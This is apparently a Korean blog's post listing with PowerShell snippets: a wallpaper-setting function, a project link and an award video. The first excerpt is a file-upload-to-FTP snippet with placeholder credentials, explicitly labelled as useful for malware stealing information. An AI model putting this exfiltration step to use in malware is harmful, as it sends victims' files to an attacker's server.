목록전체 글 (36)
-
$File = "\filepath\file" $ftp = "ftp://[id]:[password]@[host]/path/path/file" $webclient = New-Object -TypeName System.Net.WebClient $uri = New-Object -TypeName System.Uri -ArgumentList $ftp $webclient.UploadFile($uri, $File) malware 정보 탈취시 유용

# setting wallpaper function function Set-WallPaper { param ( [parameter(Mandatory=$True)] # Provide path to image [string]$Image, # Provide wallpaper style that you would like applied [parameter(Mandatory=$False)] [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] [string]$Style ) $WallpaperStyle = Switch ($Style) { "Fill" {"10"} "Fit" {"6"} "Stretch" {"2"} "Tile" {"0"} "Center" ..

https://github.com/MINIBEEF/2020-competition-eat-together MINIBEEF/2020-competition-eat-together 2020 Summer Bottom Up. Contribute to MINIBEEF/2020-competition-eat-together development by creating an account on GitHub. github.com https://www.youtube.com/watch?v=7YPPQEHDOEI 충남대학교 2020 제 2회 바텀업 경진대회 대상. contact : rjsdid7325@gmail.com